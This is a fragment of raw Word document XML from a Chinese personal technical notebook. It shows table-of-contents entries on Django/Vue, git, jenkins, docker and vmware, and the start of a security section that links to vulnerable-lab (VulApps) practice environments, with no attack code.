              <w:instrText xml:space="preserve"> PAGEREF _Toc159780264 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>885</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28C1173B" w14:textId="55CCB8FE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780265" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>同时运行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的后端和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的前端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780265 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>887</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12A4E803" w14:textId="19ED9FD5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780266" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IDEA</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780266 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>887</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B6569B2" w14:textId="791201B5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780267" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>postman</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780267 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>887</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C94AAC1" w14:textId="416AC984" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780268" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据本地化</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780268 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>887</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E6786D4" w14:textId="46796143" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780269" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitea</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780269 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>888</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74AC4F40" w14:textId="7660DCD3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780270" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jenkins</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780270 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>888</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11693B18" w14:textId="5E8EF4D0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780271" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>部署的坑点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780271 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>889</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D0CD07A" w14:textId="7C7D346D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780272" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vmware</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>疑难杂症</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780272 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>890</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FA69A1C" w14:textId="2B55B803" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780273" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>锁屏后</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vmware</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运行卡顿</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780273 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>890</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7572EA14" w14:textId="4F9BFE45" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780274" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>虚拟机内声卡问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780274 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>891</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="548AED29" w14:textId="3CEBF488" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780275" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>硬件运维及重装系统</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780275 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>891</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70B92D4F" w14:textId="0D420CC9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780276" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ventoy</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Deepin</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>系统出现</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Error verification failed 0x1A Security violation</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>错误</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780276 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>891</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B0C33BA" w14:textId="5A776694" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780277" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VPT:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞优先级技术</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780277 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>892</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B0E8750" w14:textId="6E291C24" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
          <w:pPr>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6769BF22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED66898" w14:textId="4A1988D0" w:rsidR="004C452C" w:rsidRDefault="00D619AF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc159779462"/>
      <w:r>
        <w:t>安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="77F195B6" w14:textId="77777777" w:rsidR="00D660DD" w:rsidRDefault="00D660DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F5DBA8" w14:textId="3CB6E350" w:rsidR="00D660DD" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc159779463"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场搭建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="359778F6" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB70E3D" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DC4983" w14:textId="003ED5A9" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00283A8B">
        <w:t>https://zhuanlan.zhihu.com/p/451325198</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022512BD" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C53741B" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E49FD8" w14:textId="0CFFE344" w:rsidR="00283A8B" w:rsidRDefault="009E37DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VulApps</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55357FF3" w14:textId="348F96C1" w:rsidR="009E37DD" w:rsidRDefault="009E37DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009E37DD">
        <w:t>http://vulapps.evalbug.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A622E" w14:textId="49C9D8F5" w:rsidR="009E37DD" w:rsidRPr="00283A8B" w:rsidRDefault="009C4D8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>017-2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的漏洞靶场，部署形式是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A90E1" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E1FDBB" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3999CE28" w14:textId="77777777" w:rsidR="00283A8B" w:rsidRDefault="00283A8B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
